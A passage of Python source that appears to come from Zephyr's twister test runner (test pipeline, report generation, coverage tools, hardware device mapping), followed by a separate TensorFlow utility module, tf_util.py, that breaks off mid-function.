logger.debug(f"adding {instance.name}")
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
# FIXME: This needs to move out.
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(self.calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if instance.results[k] in ["PASS"]:
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
else:
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty):
device = DUT(platform=platform, connected=True, pre_script=pre_script)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown')
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
tf_util.py
|
import joblib
import numpy as np
import tensorflow as tf # pylint: ignore-module
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/biases" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " "*(55-len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params*1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
